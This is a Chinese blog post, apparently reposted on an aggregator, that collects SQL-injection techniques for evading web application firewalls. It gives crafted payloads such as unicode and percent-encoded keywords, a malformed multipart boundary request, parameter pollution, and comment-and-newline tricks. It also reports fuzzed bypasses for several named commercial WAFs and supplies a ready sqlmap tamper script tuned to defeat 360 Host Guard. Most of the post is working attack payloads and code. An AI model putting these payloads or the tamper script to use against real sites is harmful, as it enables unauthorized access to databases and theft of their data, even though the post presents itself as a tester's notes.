sql 注入繞過 waf

阿新 • • 發佈：2018-11-27

https://notwhy.github.io/2018/06/sql-injection-fuck-waf/

0x0 前言 0x1 注入點檢測 0x2 bypass waf 0x3 自動化

0x0 前言

這裡是簡單對sql注入繞過waf的一個小總結，非安全研究員，這裡不講原理，關於原理蒐集了一些其他大佬的文章（文章在最下面請自取），感謝他們的分享，比著葫蘆畫瓢，對著各大waf廠商跟著師傅們來一波實戰,進行一個簡單的總結。

0x1 注入點檢測

一般的注入還是很好判斷的，特別是基於報錯，但有的時候略微有些奇葩的環境，再加上一些亂七八糟 waf，就比較難搞了，這裡簡單總結了一些方法。

利用資料庫獨有的一些函式
access asc chr len #access-functions
mysql substring substr length
mssql char ascii len substring #mssql function str
oracle ascii chr length substr upper lower replace(x,old,new)
這些資料庫中一個通用的函式就是abs，如果覺得是int型注入不妨先試試2-abs(1),然後結合各類資料庫的一些函式來判斷是什麼資料庫的注入,當然對資料庫瞭解越多越好。
改變請求方式
根據經驗，一般情況下各指令碼對http request method如下，這裡以GET為例子，針對www.vul.com/?id=1來進行判斷。
php GET
aspx GET
asp GET POST COOKIE
jsp GET POST
平常滲透測試中總是遇到各種各樣的waf，有的時候一個單引號就死了，這個時候首選的一些方法就是轉換請求頭了，畢竟GET不如POST，POST不如multipart/form-data，當然不要看到php就不去轉換，任何情況下都要嘗試一下。
當然，可以用burp很方便的來進行change request method以及change body encoding。

之前碰到過一個有趣的例子，asp的站點可以通過cookie提交資料，而且可以使用len函式，可以初步判斷為access或者mssql資料庫，但是還是很頭疼，最後一位大哥使用下面的函式可以判斷成功。www.vul.com/2.asp?id=482
483-chr(chr(52)&chr(57)) #=482
chr(52) ‘4’
chr(57) ‘9’
chr(49) ‘1’ #chr(52)&chr(57)為49 chr(49)為1 雖然最後也沒什麼卵用但還是挺有意思的

資料庫特性
mysql 註釋符號# –+ ` ;%00 // 字串可以使用成對的引號’admin’ = admin’’’
mssql 註釋符號– /

/ ;%00
oracle 註釋符號– /**/ admin=adm’||’in
空白符號MySQL5 09 0A 0B 0C 0D A0 20
Oracle 00 0A 0D 0C 09 20
MSSQL 01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20
mysql和mssql可以使用|來進行相關的運算，而oracle會把||當成連線字元。
web容器特性
這裡直接可以跳過看http://drops.xmd5.com/static/drops/tips-7883.html 這篇文章

1. iis+asp(x)  
    1.%u特性: iis支援對unicode的解析，如:payload為[s%u006c%u0006ect],解析出來後則是[select]
     %u0061nd 1=1
    另類%u特性: unicode在iis解析之後會被轉換成multibyte，但是轉換的過程中可能出現:多個widechar可能會轉換為同一個字元。
    如：select中的e對應的unicode為%u0065，但是%u00f0同樣會被轉換成為e s%u00f0lect
    iis+asp
    2.%特性: union selec%t user fr%om dd #iis+asp asp+iis環境下會忽略掉百分號，如：payload為[sele%ct], 解析出來後則是[select]
    3.asp/asp.net在解析請求的時候，允許Content-Type: application/x-www-form-urlencoded的資料提交方式select%201%20from%20user
    asp/asp.net request解析:
    4.在asp和asp.net中獲取使用者的提交的引數一般使用request包，當使用request(‘id’)的形式獲取包的時候，會出現GET，POST分不清的情況，譬如可以構造一個請求包，METHOD為GET，但是包中還帶有POST的內容和POST的content-type, 換一種理解方式也就是將原本的post資料包的method改成GET,如果使用request(‘id’)方式獲取資料，仍會獲取到post的內容
2. php+apache畸形的boundary
    1.php在解析multipart data的時候有自己的特性，對於boundary的識別，只取了逗號前面的內容，例如我們設定的boundary為—-aaaa,123456，php解析的時候只識別了—-aaaa,後面的內容均沒有識別。然而其他的如WAF在做解析的時候，有可能獲取的是整個字串，此時可能就會出現BYPASS
    Content-Type: multipart/form-data; boundary=------,xxxx
    Content-Length: 191
    
    ------,xxxx
    Content-Disposition: form-data; name="img"; filename="img.gif"
    
    GIF89a
    ------
    Content-Disposition: form-data; name="id"
    
    1' union select null,null,flag,null from flag limit 1 offset 1-- -
    --------
    ------,xxxx--
    2.畸形method(header頭中)
    某些apache版本在做GET請求的時候，無論method為何值均會取出GET的內容。如請求的method名為DOTA，依然會返回GET方法的值，即,可以任意替換GET方法為其它值，但仍能有效工作，但如果waf嚴格按照GET方法取值，則取不到任何內容
3. web應用層
    1.雙重URL編碼: 即web應用層在接受到經過伺服器層解碼後的引數後，又進行了一次URL解碼
    2.變換請求方式：
    在web應用中使用了統一獲取引數的方式: 如php裡使用$_REQUEST獲取引數，但WAF層如果過濾不全則容易bypass，如，waf層過濾了get/post，但沒有過濾cookie，而web應用層並不關心引數是否來自cookie
    urlencode和form-data: POST在提交資料的時候有兩種方式，第一種方式是使用urlencode的方式提交，第二種方式是使用form-data的方式提交。當我們在測試的時候，如果發現POST提交的資料被過濾掉了，此時可以考慮使用form-data的方式去提交  
4. hpp 
    asp.net + iis：id=1,2,3  #?str=a%27/*&str=*/and/*&str=*/@@version=0--
    asp + iis ：id=1,2,3
    php + apache ：id=3
    jsp + tomcat ：id=1

這裡提供一種針對普通檢測的方法，大家可自行發揮。mysql int型： %20%26%201=1 mysql.php?id=1%20%26%201=1另外在字元型中 ‘and’1’=’1是不需要加空格的，有時候也可以繞過一些waf判斷

0x2 bypasswaf

由於mysql的靈活性，這裡以mysql繞過為主，針對各大主流waf廠商進行一個測試，主要測試線上版的，本地就安裝了一個360主機衛士。其中http://192.168.44.132/mysql.php?id=1是我本地的一個測試環境
其中下面的繞過都是以fuzz為主，不考慮web容器的特性，嘗試繞過聯合查詢 -1 union select 1，2，3 from dual

百度雲加速bypass
union select #filter
from dual #not filted
select from dual #filter
只需要繞過select即可使用–+aaaaaa%0a可bypass
360主機衛士bypass
發現%23%0aand%230a1=1 可以繞過and 1=1 限制
最後在union select from的時候卻繞不過去
直接使用大字串來fuzz %23-FUZZ-%0a https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt 發現可以成功繞過waf
雲鎖
union select 如下就可以繞過
http://www.yunsuo.com.cn/download.html?id=1%20union/!/!select%201,2,3*/
轉換成multiform/data可輕鬆繞過
安全狗bypass
直接搞就行了當然也可以chunked提交

阿里雲
嘗試使用自定義變數方式來繞過 @a:=(select @b:=table_namefrom{a information_schema.TABLES }limit 0,1)union select ‘1’,@a
@p:=(select)被過濾 fuzz下p引數使用@$:=(select)可以繞過
union select 1被過濾使用union%23aa%0a/!select–%01%0a/1,@$,3 可以繞過
發現重點就是繞過表名 select 1 from dual 一些常規的方法測試無果隨便fuzz下注釋/!數字/卻偶然發現有倆個數據包遺漏
想起了以前烏雲上一哥的的一個漏洞https://wooyun.shuimugan.com/bug/view?bug_no=94367

難道是因為訪問頻率導致遺漏？隨即我又進行了一些fuzz fuzz1w到5w數字型的註釋加大執行緒發現遺漏了更多

我想測試一下之前的waf挑戰賽，發現之前提交的payload已經修復了，而且那個漏洞url無法訪問了:( 所以無法確認。
隨即我又進行了一些超長字串的fuzz 簡單fuzz1w-10w 以500為step 發現現象更多了可初步判斷存在遺漏

0x3 自動化

以360主機衛士為例，編寫sqlmap tamper指令碼。
正常無waf sqlmap聯合查詢如下：
開啟主機衛士，放到瀏覽器除錯，修改相關payload使其能正常執行。最後tamper指令碼如下：

from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING
__priority__ = PRIORITY.LOW
def dependencies():
  pass
def tamper(payload, **kwargs):
  """
  Replaces keywords
  >>> tamper('UNION SELECT id FROM users')
  '1 union%[email protected]%23$%%5e%26%2a()%60~%0a/*!12345select*/ NULL,/*!12345CONCAT*/(0x7170706271,IFNULL(/*!12345CASt(*/COUNT(*) AS CHAR),0x20),0x7171786b71),NULL/*!%[email protected]%23$%%5e%26%2a()%60~%0afrOm*/INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e AND table_schema=0x73716c696e6a656374--
  """
  if payload:
      payload=payload.replace("UNION ALL SELECT","union%[email protected]%23$%%5e%26%2a()%60~%0a/*!12345select*/")
      payload=payload.replace("UNION SELECT","union%[email protected]%23$%%5e%26%2a()%60~%0a/*!12345select*/")
      payload=payload.replace(" FROM ","/*!%[email protected]%23$%%5e%26%2a()%60~%0afrOm*/")
      payload=payload.replace("CONCAT","/*!12345CONCAT*/")
      payload=payload.replace("CAST(","/*!12345CAST(*/")
      payload=payload.replace("CASE","/*!12345CASE*/")
      payload=payload.replace("DATABASE()","database/**/()")
                
  return payload

可以成功獲取到相關資料。其他參考連結如下：

http://www.anquan.us/search?keywords=bypass&content_search_by=by_bugs
http://drops.xmd5.com/static/drops/tips-7883.html
https://xianzhi.aliyun.com/forum/attachment/big_size/wafbypass_sql.pdf
http://drops.xmd5.com/static/drops/papers-4323.html  
https://www.cnblogs.com/xiaozi/p/6927348.html  
http://swende.se/blog/HTTPChunked.html#  
https://xz.aliyun.com/t/1239
http://www.sqlinjectionwiki.com/categories/2/mysql-sql-injection-cheat-sheet/  
https://mp.weixin.qq.com/s/S318-e4-eskfRG38HZk_Qw  
https://joychou.org/web/nginx-Lua-waf-general-bypass-method.html    #nginx lua waf  
https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF  
https://websec.ca/kb/sql_injection#MySQL_Comment_Out_Query  
https://forum.bugcrowd.com/t/sqlmap-tamper-scripts-sql-injection-and-waf-bypass/423

sql 注入繞過 waf

0x0 前言

0x1 注入點檢測

0x2 bypasswaf

0x3 自動化

sql 注入繞過 waf

sql注入繞過union select過濾

SQL注入繞過防火牆

滲透之——SQL注入繞過技術總結

sql注入繞過的一些方法

【SQL注入技巧拓展】————16、繞過WAF注入

SQL注入&WAF繞過姿勢

如何繞過網站防火牆WAF進一步sql注入

繞過安全狗進行sql注入（MySQL）

SQL注入之騷姿勢小記 & 替換繞過

SQL注入筆記05：利用和繞過

ctf sql注入關鍵詞繞過【積累中】

【SQL注入技巧拓展】————4、高階SQL注入：混淆和繞過

【SQL注入技巧拓展】————3、SQL注入防禦與繞過的幾種姿勢

SQL 注入基礎系列2——利用 SQL 漏洞繞過登入驗證

SQL注入過濾限制繞過方法---轉

sql注入——不定期更新（二、關鍵詞繞過）

SQL注入之逗號攔截繞過

一個繞過MD5的SQL注入技巧

高階SQL注入：混淆和繞過

sql 注入 繞過 waf

0x0 前言

0x1 注入點檢測

0x2 bypasswaf

0x3 自動化

相關推薦

sql 注入繞過 waf